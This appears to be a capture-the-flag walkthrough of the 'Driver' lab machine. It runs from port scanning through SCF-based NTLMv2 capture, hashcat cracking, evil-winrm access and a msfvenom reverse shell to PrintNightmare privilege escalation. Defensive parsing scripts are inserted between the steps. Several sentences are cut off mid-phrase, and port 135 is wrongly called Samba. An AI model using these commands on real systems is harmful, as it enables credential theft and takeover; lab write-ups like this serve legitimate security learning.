First, let's scan for open ports using nmap. We can quickly scan for open ports and store them in a variable:

```sh
ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.106 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
```

Then, we can scan those specific ports in depth by running nmap's built-in scripts:

```sh
nmap -p$ports -sC -sV 10.10.11.106
```
```text
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_ Message signing enabled but not required
| date: 2022-02-19T11:40:18
|_ start_date: 2022-02-19T05:20:32
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
```
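The scan output above is worth parsing rather than eyeballing: the port list feeds the second scan, and the host script results carry the security-relevant findings (HTTP Basic auth on port 80, SMB message signing disabled). The following is an added example, not code from the original post; it reimplements the shell pipeline's port extraction in Python and pulls out those findings from the nmap text quoted above, which is embedded here as a constructed sample.

```python
import re

# Constructed sample: the nmap -sC -sV output quoted above (raw string so \x0D stays literal).
NMAP_OUTPUT = r"""
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_ Message signing enabled but not required
| date: 2022-02-19T11:40:18
|_ start_date: 2022-02-19T05:20:32
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
"""

# A PORT/STATE/SERVICE/VERSION line: "80/tcp open http Microsoft IIS httpd 10.0"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_services(output):
    """Return (services, host_notes). Each service dict carries the NSE script
    lines ('|' lines) that follow its port; lines after 'Host script results:'
    belong to the host, not to the last port."""
    services, host_notes = [], []
    in_host_scripts = False
    for line in output.splitlines():
        if line.startswith("Host script results:"):
            in_host_scripts = True
            continue
        m = PORT_LINE.match(line)
        if m:
            services.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "notes": [],
            })
        elif line.startswith("|"):
            note = line.lstrip("|_ ").strip()      # drop the "|_ " / "| " prefix
            if in_host_scripts:
                host_notes.append(note)
            elif services:
                services[-1]["notes"].append(note)
    return services, host_notes


def port_list(services):
    """Same result as the grep/cut/tr/sed pipeline: '80,135,445,5985'."""
    return ",".join(str(s["port"]) for s in services if s["state"] == "open")


def findings(services, host_notes):
    """Collect the security-relevant observations from the script output."""
    found = []
    for s in services:
        if any(n.startswith("Basic realm=") for n in s["notes"]):
            found.append(f"basic-auth:{s['port']}")       # HTTP Basic auth prompt
    if any(n.startswith("message_signing: disabled") for n in host_notes):
        found.append("smb-signing-disabled")               # relay-friendly SMB config
    return found


if __name__ == "__main__":
    svcs, host = parse_services(NMAP_OUTPUT)
    print(port_list(svcs))
    print(findings(svcs, host))
```

The host-script flag matters: without it, the `message_signing` lines would be attached to port 5985, which is the kind of mistake that makes an automated report point the finding at the wrong service.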
Going to the website on port 80 gives an HTTP authentication dialogue box. Signing in with the credentials `admin:admin` works. There is a `fw_up.php` page where we can upload firmware, but there doesn't seem to be an accessible location where those files get uploaded to.

A directory bruteforce scan reveals nothing:

```sh
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.106/FUZZ
```
According to HackTricks, "Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP... If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine (as if you were using SSH!)"
Under the "WinRM connection in Linux" heading, HackTricks mentions using Hackplayers/evil-winrm. We need valid credentials to use this protocol.
This leaves one port, 135, which is for Samba. According to Wikipedia, "Server Message Block (SMB) is a communication protocol that Microsoft created for providing shared access to files and printers across nodes on a network." Since the other two ports look like dead ends for now, we must be able to find something here. Maybe the files are being uploaded to the Samba share, which would mean we have write access to that share without authentication details.

Under this assumption, searching online for "smb unauthenticated write access exploit" reveals this post about SCF file attacks on SMB. Apparently, if SMB "is configured with write permissions for unauthenticated users then it is possible to obtain passwords hashes of domain users or Meterpreter shells."

On the HackTricks post about WinRM there is a subheading called "Pass the hash with evil-winrm." So, if we can get a hash with an SCF attack, we can pass the hash and get a user shell with `evil-winrm`.
Searching for "SMB SCF file exploit" shows these additional results: sql--injection.blogspot.com and 1337red.wordpress.com.
Essentially, an SCF file is used to control Windows Explorer. So, when a user browses to a folder containing an SCF file, Windows will act on the contents of that file. We can create an SCF file like this:

We set `X.X.X.X` to our attacker's IP address. Since the `IconFile` field is set to a UNC path, Windows will request the icon from the attacker and try to authenticate with the user's credentials; the attacker then issues a challenge, and Windows returns a challenge response containing the NTLMv2 hash.

Then, we upload the SCF file using the firmware upload page (`fw_up.php`) on port 80.
Responder outputs the following:

```text
[SMB] NTLMv2 Client : ::ffff:10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:566dd632a8e52118:AA64BDEA4F87F24A42C8CDFA48DF7780:0101000000000000FA685E0C8F25D801E8816037B7647BED00000000020000000000000000000000
```

We have our NTLMv2 hash!
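What Responder prints is not a password hash but the NetNTLMv2 challenge/response pair: the server challenge, the client's HMAC (NTProofStr) and the client "blob" the HMAC was computed over, which carries a timestamp and the client challenge. Knowing the layout helps when triaging such captures from logs or packet data (the timestamp is the client's clock, useful for correlating with Windows event logs). The parser below is an added example, not part of the original post or of Responder; it decodes the line quoted above, embedded here as a constructed sample, using the field layout from MS-NLMP.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: the capture line quoted above from Responder.
RESPONDER_LINE = ("[SMB] NTLMv2 Hash : tony::DRIVER:566dd632a8e52118:"
                  "AA64BDEA4F87F24A42C8CDFA48DF7780:"
                  "0101000000000000FA685E0C8F25D801E8816037B7647BED"
                  "00000000020000000000000000000000")

HASH_RE = re.compile(r"NTLMv2 Hash\s*:\s*(\S+)")
# 100-ns ticks between the FILETIME epoch (1601-01-01) and the Unix epoch.
FILETIME_EPOCH_DELTA = 116444736000000000
# MS-NLMP AV_PAIR ids carried in the blob's target info.
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            9: "TargetName"}


def filetime_to_datetime(hex_le):
    """Decode a little-endian FILETIME (8 bytes, hex) to a UTC datetime."""
    ticks = int.from_bytes(bytes.fromhex(hex_le), "little")
    secs = (ticks - FILETIME_EPOCH_DELTA) // 10_000_000
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=secs)


def parse_av_pairs(hex_pairs):
    """Walk the AV_PAIR list (id:2, len:2, value) until MsvAvEOL (id 0)."""
    data = bytes.fromhex(hex_pairs)
    pairs, off = [], 0
    while off + 4 <= len(data):
        av_id = int.from_bytes(data[off:off + 2], "little")
        av_len = int.from_bytes(data[off + 2:off + 4], "little")
        off += 4
        if av_id == 0:
            break
        value = data[off:off + av_len].decode("utf-16-le", errors="replace")
        off += av_len
        pairs.append((AV_NAMES.get(av_id, f"AvId{av_id}"), value))
    return pairs


def parse_netntlmv2(line):
    """Split a Responder/hashcat-style line user::domain:chal:ntproof:blob."""
    m = HASH_RE.search(line)
    if not m:
        raise ValueError("no NTLMv2 hash on this line")
    fields = m.group(1).split(":")
    if len(fields) != 6 or fields[1] != "":
        raise ValueError("expected user::domain:challenge:ntproofstr:blob")
    user, _, domain, server_challenge, nt_proof, blob = fields
    server_challenge, nt_proof, blob = (x.lower() for x in (server_challenge, nt_proof, blob))
    if len(server_challenge) != 16 or len(nt_proof) != 32:
        raise ValueError("server challenge must be 8 bytes, NTProofStr 16 bytes")
    if not blob.startswith("0101"):
        raise ValueError("blob must start with RespType/HiRespType 0x01 0x01")
    # Blob layout (hex offsets): 0-8 type+reserved, 8-16 reserved,
    # 16-32 timestamp, 32-48 client challenge, 48-56 reserved, 56- AV pairs.
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge,
        "nt_proof_str": nt_proof,
        "timestamp": filetime_to_datetime(blob[16:32]),
        "client_challenge": blob[32:48],
        "av_pairs": parse_av_pairs(blob[56:]),
        "hashcat_mode": 5600,   # hashcat's NetNTLMv2 mode
    }


if __name__ == "__main__":
    for k, v in parse_netntlmv2(RESPONDER_LINE).items():
        print(f"{k}: {v}")
```

The blob's timestamp decodes to 2022-02-19T12:48:52 UTC, the same day as the `date` value in the nmap host script output above, which is the kind of cross-check a responder would use to tie a captured authentication to a specific client session.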
We can crack this hash with `hashcat`. We first find the `hashcat` mode needed for NTLMv2 hashes with `hashcat --help | grep NTLMv2`, which shows us the correct mode is 5600.

So, we paste the hash into a file called `hash` and then run:

```sh
hashcat -a 0 -m 5600 hash rockyou.txt
```

The password is `liltony`.
According to HackTricks, we can use `evil-winrm -u <username> -p <password> -i <IP>`. Let's connect as the `tony` user like so:

```sh
evil-winrm -u tony -p liltony -i 10.10.11.106
```

We get a shell on the machine! Now, we can get the
Let's upload WinPEAS to scan for ways to gain privileges. Since we are using `evil-winrm`, we can simply run `upload /home/kali/Downloads/winPEASx64.exe`. We can run it with `.\winPEASx64.exe`. This doesn't give any easy wins.
To get a Meterpreter shell, run the following on the attacker machine:

```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe > e.exe
```

In msfconsole:

```text
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
```

In `evil-winrm` on the target, run `upload e.exe` and then
Then, back in the Meterpreter session, run `background` to get back to `msfconsole`. Then run `use post/multi/recon/local_exploit_suggester`, set the session with `set session 1`, then `run` to get a list of possible exploits. This reveals nothing.
So, the actual exploit that should be used is CVE-2021-34527, or PrintNightmare. After enough searching, one may find this exploit because the `spoolsv` service is running, as shown in WinPEAS's "Current TCP Listening Ports" output (and when simply running
```text
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 135 0.0.0.0 0 Listening 708 svchost
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49408 0.0.0.0 0 Listening 464 wininit
TCP 0.0.0.0 49409 0.0.0.0 0 Listening 868 svchost
TCP 0.0.0.0 49410 0.0.0.0 0 Listening 844 svchost
TCP 0.0.0.0 49411 0.0.0.0 0 Listening 1176 spoolsv
TCP 0.0.0.0 49412 0.0.0.0 0 Listening 572 services
TCP 0.0.0.0 49413 0.0.0.0 0 Listening 580 lsass
TCP 10.10.11.106 139 0.0.0.0 0 Listening 4 System
TCP 10.10.11.106 445 10.10.14.78 36684 Established 4 System
TCP 10.10.11.106 5985 10.10.14.32 59202 Time Wait 0 Idle
TCP 10.10.11.106 5985 10.10.14.32 59204 Established 4 System
```
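The clue in that table is a process name, not a port number: the Print Spooler (`spoolsv`) holding a listening RPC endpoint is what makes the host a candidate for CVE-2021-34527, and a defender doing the same inventory wants the spooler's exposure, plus the remote peers currently connected, pulled out of the table automatically. The following is an added example, not code from the original post or from WinPEAS; it parses the table quoted above (embedded as a constructed sample) and handles the one awkward row, the two-word "Time Wait" state.

```python
# Constructed sample: the "Current TCP Listening Ports" table quoted above.
LISTENING_TABLE = """
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 135 0.0.0.0 0 Listening 708 svchost
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49408 0.0.0.0 0 Listening 464 wininit
TCP 0.0.0.0 49409 0.0.0.0 0 Listening 868 svchost
TCP 0.0.0.0 49410 0.0.0.0 0 Listening 844 svchost
TCP 0.0.0.0 49411 0.0.0.0 0 Listening 1176 spoolsv
TCP 0.0.0.0 49412 0.0.0.0 0 Listening 572 services
TCP 0.0.0.0 49413 0.0.0.0 0 Listening 580 lsass
TCP 10.10.11.106 139 0.0.0.0 0 Listening 4 System
TCP 10.10.11.106 445 10.10.14.78 36684 Established 4 System
TCP 10.10.11.106 5985 10.10.14.32 59202 Time Wait 0 Idle
TCP 10.10.11.106 5985 10.10.14.32 59204 Established 4 System
"""

# Services whose listening endpoints a reviewer should look at twice.
# The spooler entry is the case discussed above (CVE-2021-34527).
WATCHLIST = {"spoolsv": "Print Spooler exposed over RPC; check CVE-2021-34527 patch state"}


def parse_listening_table(text):
    """Turn the whitespace-separated table into row dicts. The first five and
    last two columns are single tokens; whatever sits between them is the
    State column, which may be two words ("Time Wait")."""
    rows = []
    for line in text.strip().splitlines()[1:]:       # skip the header row
        tok = line.split()
        if len(tok) < 8:
            continue
        proto, laddr, lport, raddr, rport = tok[:5]
        pid, pname = tok[-2:]
        rows.append({
            "proto": proto,
            "local": (laddr, int(lport)),
            "remote": (raddr, int(rport)),
            "state": " ".join(tok[5:-2]),
            "pid": int(pid),
            "process": pname,
        })
    return rows


def listeners(rows):
    """Map process name -> sorted list of ports it is listening on."""
    out = {}
    for r in rows:
        if r["state"] == "Listening":
            out.setdefault(r["process"], set()).add(r["local"][1])
    return {name: sorted(ports) for name, ports in out.items()}


def watchlist_hits(rows):
    """Return (process, port, reason) for listening processes on the watchlist."""
    return [(r["process"], r["local"][1], WATCHLIST[r["process"]])
            for r in rows
            if r["state"] == "Listening" and r["process"] in WATCHLIST]


def remote_peers(rows):
    """Addresses with an established connection to the host."""
    return sorted({r["remote"][0] for r in rows if r["state"] == "Established"})


if __name__ == "__main__":
    table = parse_listening_table(LISTENING_TABLE)
    print(listeners(table))
    print(watchlist_hits(table))
    print(remote_peers(table))
```

On the sample, the only watchlist hit is `spoolsv` on port 49411, and the established peers are the two addresses from the writeup's own tooling (10.10.14.78 on SMB, 10.10.14.32 on WinRM), which is exactly the pairing a responder would expect to see for the capture and shell steps described above.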
0xdf's article "Playing with PrintNightmare" is a great tutorial on how to exploit this vulnerability. Invoke-Nightmare, a PowerShell script developed by Caleb Stewart and John Hammond, is the simplest PrintNightmare exploit to use.

We can download the exploit to our attacker machine with `wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1` and then upload it to the target over our `evil-winrm` connection by running `upload CVE-2021-1675.ps1`. Then, run `set-ExecutionPolicy RemoteSigned -Scope CurrentUser` so you don't get the "execution of scripts is disabled on this system" error message (StackOverflow answer where the command was found). Now, we can launch the exploit:

```powershell
Invoke-Nightmare -NewUser "john" -NewPassword "SuperSecure"
```
Originally, I saw the `[!] failed to get current driver list` error message, but after resetting the box it worked:

```text
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
```
Now, all we have to do is connect with `evil-winrm` as our newly created administrator:

```sh
evil-winrm -u john -p SuperSecure -i 10.10.11.106
```

We can get the